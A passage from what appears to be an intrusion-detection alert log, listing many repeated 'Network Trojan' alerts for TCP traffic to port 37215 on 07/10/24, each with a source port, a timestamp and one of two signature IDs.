                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.081335
                  SID:2829579
                  Source Port:59322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.955612
                  SID:2835222
                  Source Port:38888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.810736
                  SID:2835222
                  Source Port:48088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.813021
                  SID:2835222
                  Source Port:59316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.432411
                  SID:2835222
                  Source Port:49244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.799861
                  SID:2829579
                  Source Port:43200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.912875
                  SID:2835222
                  Source Port:38910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.575243
                  SID:2835222
                  Source Port:59344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.783807
                  SID:2835222
                  Source Port:47200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.429135
                  SID:2829579
                  Source Port:35114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469425
                  SID:2829579
                  Source Port:59254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.696289
                  SID:2829579
                  Source Port:52380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.973887
                  SID:2835222
                  Source Port:49704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.434490
                  SID:2829579
                  Source Port:33540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.973962
                  SID:2829579
                  Source Port:44206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.392999
                  SID:2829579
                  Source Port:37670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.672822
                  SID:2835222
                  Source Port:50092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.907657
                  SID:2829579
                  Source Port:53210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.651958
                  SID:2835222
                  Source Port:58954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.853234
                  SID:2829579
                  Source Port:39190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.183913
                  SID:2835222
                  Source Port:38142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.596849
                  SID:2835222
                  Source Port:34024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.882178
                  SID:2829579
                  Source Port:53982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.901645
                  SID:2835222
                  Source Port:36850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.558138
                  SID:2829579
                  Source Port:49942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.417840
                  SID:2829579
                  Source Port:47498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.887400
                  SID:2829579
                  Source Port:52150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.989369
                  SID:2829579
                  Source Port:58120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.869693
                  SID:2829579
                  Source Port:35620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.883243
                  SID:2835222
                  Source Port:34768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.294371
                  SID:2835222
                  Source Port:60242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.746967
                  SID:2835222
                  Source Port:56832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.061341
                  SID:2829579
                  Source Port:35356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.412005
                  SID:2829579
                  Source Port:32970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.905026
                  SID:2835222
                  Source Port:46528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.652788
                  SID:2829579
                  Source Port:43376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.607972
                  SID:2829579
                  Source Port:56606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.234449
                  SID:2835222
                  Source Port:47910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.207305
                  SID:2829579
                  Source Port:36316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.640181
                  SID:2829579
                  Source Port:52520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369832
                  SID:2829579
                  Source Port:49630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.035789
                  SID:2829579
                  Source Port:39276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.281648
                  SID:2835222
                  Source Port:54220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.896369
                  SID:2835222
                  Source Port:54810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.171262
                  SID:2829579
                  Source Port:39662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.607136
                  SID:2829579
                  Source Port:40520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.824367
                  SID:2829579
                  Source Port:59688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.281423
                  SID:2835222
                  Source Port:38894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.517659
                  SID:2835222
                  Source Port:41570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.975422
                  SID:2835222
                  Source Port:58522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.633994
                  SID:2829579
                  Source Port:47380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.207710
                  SID:2829579
                  Source Port:36718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.092511
                  SID:2829579
                  Source Port:38598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.598670
                  SID:2835222
                  Source Port:41162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.295536
                  SID:2829579
                  Source Port:50846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835160
                  SID:2835222
                  Source Port:52400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.448470
                  SID:2829579
                  Source Port:40872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.781687
                  SID:2829579
                  Source Port:43386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.164992
                  SID:2829579
                  Source Port:36306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.410235
                  SID:2829579
                  Source Port:57874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.695962
                  SID:2835222
                  Source Port:44992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.669841
                  SID:2835222
                  Source Port:33458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.863531
                  SID:2829579
                  Source Port:45104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.706461
                  SID:2835222
                  Source Port:37576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.505906
                  SID:2835222
                  Source Port:37358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.518150
                  SID:2829579
                  Source Port:33846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.610191
                  SID:2829579
                  Source Port:56890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.562285
                  SID:2829579
                  Source Port:56114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.834804
                  SID:2835222
                  Source Port:52008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.954167
                  SID:2829579
                  Source Port:37600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.619683
                  SID:2829579
                  Source Port:42898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.173734
                  SID:2829579
                  Source Port:39952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.628167
                  SID:2829579
                  Source Port:35384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.914013
                  SID:2835222
                  Source Port:43620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.102674
                  SID:2835222
                  Source Port:54576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.487311
                  SID:2829579
                  Source Port:38712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.927872
                  SID:2835222
                  Source Port:57468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.033866
                  SID:2835222
                  Source Port:43252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.564107
                  SID:2829579
                  Source Port:40442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.789365
                  SID:2835222
                  Source Port:45148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.225771
                  SID:2835222
                  Source Port:58544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.564208
                  SID:2829579
                  Source Port:50834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.408660
                  SID:2829579
                  Source Port:42136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.998912
                  SID:2829579
                  Source Port:46558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469425
                  SID:2829579
                  Source Port:40392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.534474
                  SID:2829579
                  Source Port:60860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.716778
                  SID:2829579
                  Source Port:47538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.340650
                  SID:2829579
                  Source Port:42684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.333954
                  SID:2829579
                  Source Port:49068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.840870
                  SID:2829579
                  Source Port:33214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.911510
                  SID:2829579
                  Source Port:43192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.463838
                  SID:2829579
                  Source Port:46236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.631103
                  SID:2829579
                  Source Port:60432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.155677
                  SID:2829579
                  Source Port:58192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.619862
                  SID:2835222
                  Source Port:57316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.466887
                  SID:2835222
                  Source Port:55140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.832747
                  SID:2829579
                  Source Port:50758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.245667
                  SID:2829579
                  Source Port:35010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.357682
                  SID:2835222
                  Source Port:51126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.285291
                  SID:2829579
                  Source Port:33740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.051778
                  SID:2829579
                  Source Port:44522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.025929
                  SID:2835222
                  Source Port:53646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.295464
                  SID:2835222
                  Source Port:36244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.372864
                  SID:2829579
                  Source Port:36138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.405669
                  SID:2829579
                  Source Port:38732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.189899
                  SID:2829579
                  Source Port:52708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.239107
                  SID:2829579
                  Source Port:55900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.597902
                  SID:2835222
                  Source Port:51024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.763475
                  SID:2829579
                  Source Port:51406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.748241
                  SID:2829579
                  Source Port:38638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.468333
                  SID:2835222
                  Source Port:37096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.196013
                  SID:2835222
                  Source Port:46222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.908493
                  SID:2829579
                  Source Port:59144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.667245
                  SID:2829579
                  Source Port:52016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.494437
                  SID:2829579
                  Source Port:54428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.543702
                  SID:2829579
                  Source Port:45374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.904364
                  SID:2829579
                  Source Port:54126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.640605
                  SID:2835222
                  Source Port:43366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.132992
                  SID:2829579
                  Source Port:33744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.325591
                  SID:2829579
                  Source Port:42184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.392755
                  SID:2835222
                  Source Port:39326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.607971
                  SID:2835222
                  Source Port:49268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.490587
                  SID:2829579
                  Source Port:42618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.507849
                  SID:2829579
                  Source Port:52692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.189218
                  SID:2835222
                  Source Port:33674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.771626
                  SID:2835222
                  Source Port:47862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.174460
                  SID:2835222
                  Source Port:36310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.554449
                  SID:2835222
                  Source Port:60634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.008729
                  SID:2829579
                  Source Port:35136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.994856
                  SID:2835222
                  Source Port:45142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.819532
                  SID:2835222
                  Source Port:33834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.623992
                  SID:2835222
                  Source Port:44810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.755062
                  SID:2835222
                  Source Port:48852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.824955
                  SID:2829579
                  Source Port:39362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.585766
                  SID:2835222
                  Source Port:54298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.238567
                  SID:2835222
                  Source Port:36068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.429574
                  SID:2829579
                  Source Port:48862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.271475
                  SID:2835222
                  Source Port:52398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.293782
                  SID:2835222
                  Source Port:47264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.421693
                  SID:2835222
                  Source Port:38062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.743815
                  SID:2829579
                  Source Port:55388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.175137
                  SID:2835222
                  Source Port:52660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.680927
                  SID:2829579
                  Source Port:46254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.850694
                  SID:2829579
                  Source Port:51858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.299447
                  SID:2835222
                  Source Port:34640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.512620
                  SID:2829579
                  Source Port:54690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.147392
                  SID:2835222
                  Source Port:44394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.644111
                  SID:2829579
                  Source Port:50986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.067488
                  SID:2829579
                  Source Port:57312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.169986
                  SID:2835222
                  Source Port:33106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.177795
                  SID:2835222
                  Source Port:57802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.712614
                  SID:2835222
                  Source Port:57274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.657792
                  SID:2835222
                  Source Port:56798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.082361
                  SID:2829579
                  Source Port:57388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.809769
                  SID:2829579
                  Source Port:34510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.231891
                  SID:2829579
                  Source Port:33872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.640337
                  SID:2835222
                  Source Port:36340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.893845
                  SID:2829579
                  Source Port:41972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.752135
                  SID:2835222
                  Source Port:39514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.284945
                  SID:2835222
                  Source Port:59684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.758279
                  SID:2829579
                  Source Port:41546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.279248
                  SID:2835222
                  Source Port:58352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.513767
                  SID:2835222
                  Source Port:46568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.324879
                  SID:2835222
                  Source Port:60224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.002573
                  SID:2835222
                  Source Port:33318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.009687
                  SID:2835222
                  Source Port:41978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.144044
                  SID:2835222
                  Source Port:41180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.133691
                  SID:2829579
                  Source Port:34582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.654312
                  SID:2829579
                  Source Port:57228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.211631
                  SID:2835222
                  Source Port:59430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.826871
                  SID:2829579
                  Source Port:42204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.008674
                  SID:2835222
                  Source Port:49092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.775624
                  SID:2835222
                  Source Port:47340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.805226
                  SID:2829579
                  Source Port:41536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.739832
                  SID:2835222
                  Source Port:36768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.224533
                  SID:2835222
                  Source Port:49564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.170023
                  SID:2835222
                  Source Port:59020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.412870
                  SID:2835222
                  Source Port:52266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.024186
                  SID:2829579
                  Source Port:41536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.036814
                  SID:2829579
                  Source Port:36658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.522450
                  SID:2829579
                  Source Port:40094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.418082
                  SID:2835222
                  Source Port:58346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.179431
                  SID:2829579
